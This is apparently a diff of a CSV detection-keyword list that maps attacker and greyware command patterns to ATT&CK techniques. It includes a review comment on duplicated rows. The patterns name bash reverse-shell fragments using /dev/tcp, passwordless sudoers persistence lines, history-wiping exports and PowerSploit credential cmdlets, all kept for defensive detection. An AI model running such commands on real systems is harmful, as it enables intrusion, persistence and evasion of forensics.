 "*dpplabbmogkhghncfbfdeeokoefdjegm*","greyware_tool_keyword","Proxy SwitchySharp","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*dsquery * -filter *(objectClass=trustedDomain)* -attr *","greyware_tool_keyword","dsquery","enumerate domain trusts with dsquery","T1482 - T1018","TA0007","N/A","APT41 - FIN8","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*dumpcap -*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
-"*e1ff2208b3786cac801ffb470b9475fbb3ced74eb503bfde7aa7f22af113989d*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
-"*echo * .bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z"
-"*echo * /home/*/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z"
-"*echo * /root/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z"
+"*e1ff2208b3786cac801ffb470b9475fbb3ced74eb503bfde7aa7f22af113989d*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*echo * .bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*echo * /home/*/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*echo * /root/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
 "*echo * ALL=(ALL) NOPASSWD: ALL* >>/etc/sudoers*","greyware_tool_keyword","sudoers","use SUDO without password","T1548.002 - T1059.004 - T1078.004","TA0004 - TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
 "*echo * ALL=NOPASSWD: /bin/bash* >>/etc/sudoers*","greyware_tool_keyword","sudoers","use SUDO without password","T1548.002 - T1059.004 - T1078.004","TA0004 - TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
 "*echo *%sudo ALL=(ALL) NOPASSWD: ALL* >> /etc/sudoers*","greyware_tool_keyword","sudo","Sudo Persistence via sudoers file","T1078 - T1166","TA0003","N/A","N/A","Persistence","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
@@ -467,19 +467,19 @@ "*ejkaocphofnobjdedneohbbiilggdlbi*","greyware_tool_keyword","Hotspot Shield Elite VPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*elastic-agent.exe uninstall*","greyware_tool_keyword","elastic-agent","uninstall elast-agent from the system","T1562.004 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","6","8","N/A","N/A","N/A","N/A" "*eppiocemhmnlbhjplcgkofciiegomcon*","greyware_tool_keyword","Urban Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" -"*error in libcrypto*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" -"*exec /bin/sh 0&0 2>&0*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive 
!","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" -"*exec 5<>/dev/tcp/*/**cat <&5 | while read line* do $line 2>&5 >&5* done*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" -"*export HISTFILE=/dev/null*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*export HISTFILESIZE=0*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. 
","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8145","2531","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" -"*export HISTFILESIZE=0*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" +"*error in libcrypto*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*exec /bin/sh 0&0 2>&0*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*exec 5<>/dev/tcp/*/**cat <&5 | while read line* do $line 2>&5 >&5* done*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell 
spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*export HISTFILE=/dev/null*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*export HISTFILESIZE=0*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*export HISTFILESIZE=0*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" "*export HISTFILESIZE=0*","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - 
TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*export HISTSIZE=0*","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*external-nse-script-library*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" -"*fatal: buffer_get_string: bad string*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*fatal: buffer_get_string: bad string*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" "*fcfhplploccackoneaefokcmbjfbkenj*","greyware_tool_keyword","1clickVPN","External VPN usage within coporate 
network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*fdcgdnkidjaadafnichfpabhfomcebme*","greyware_tool_keyword","ZenMate VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" -"*ff6e67d725ee64b4607dc6490a706dc9234c708cff814477de52d3beb781c6a1*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*ff6e67d725ee64b4607dc6490a706dc9234c708cff814477de52d3beb781c6a1*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*ffbkglfijbcbgblgflchnbphjdllaogb*","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" 
"*ffhhkmlgedgcliajaedapkdfigdobcif*","greyware_tool_keyword","Nucleus VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*fgddmllnllkalaagkghckoinaemmogpe*","greyware_tool_keyword","ExpressVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" 
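Review bot: The keyword `*export HISTFILESIZE=0*` appears on three rows on the new side of this hunk, and the refresh rewrites two of them without consolidating. Two rows have `metadata_tool` set to `bash` (one cites atomic-red-team, the other elastic/detection-rules) and the third, a context row, has `export`. How consumers treat repeated keys is not visible here, but a loader that indexes on `keyword` would either keep only one row's techniques and link or report the same command line more than once. I would keep a single row per `keyword` and `metadata_tool` pair, carry the second reference in `metadata_comment`, and have the script that refreshes the star and fork columns fail when it sees a repeated pair.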
@@ -532,20 +532,20 @@ "*getent passwd | cut -d: -f1*","greyware_tool_keyword","getent","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-LoggedonLocal -ComputerName *","greyware_tool_keyword","powershell","PowerView get Locally logged users on a machine","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-MpComputerStatus*","greyware_tool_keyword","powershell","Gets the status of antimalware software on the computer.","T1063","TA0005 - TA0007","N/A","N/A","Discovery","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*Get-NetForestCatalog*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetForestDomain*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetForestTrust*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetForestCatalog*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetForestDomain*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetForestTrust*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetGroupMember -GroupName *DNSAdmins*","greyware_tool_keyword","powershell","the command is used to discover the members of a specific domain group DNSAdmins which can provide an adversary with valuable information about the target environment. The knowledge of group members can be exploited by attackers to identify potential targets for privilege escalation or lateral movement within the network.","T1069.001","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*Get-NetSession*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetShare*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetSubnet*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetSession*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetShare*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetSubnet*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetUser -SPN*","greyware_tool_keyword","powershell","PowerView Find users with SPN","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*Get-RegistryAutoLogon*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-SiteListPassword*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-TimedScreenshot*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-UnquotedService*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-RegistryAutoLogon*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-SiteListPassword*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-TimedScreenshot*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-UnquotedService*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*ggackgngljinccllcmbgnpgpllcjepgc*","greyware_tool_keyword","WindmillVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" -"*github*/xmrig/xmrig*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*github*/xmrig/xmrig*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*gjknjjomckknofjidppipffbpoekiipm*","greyware_tool_keyword","VPN Free","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - 
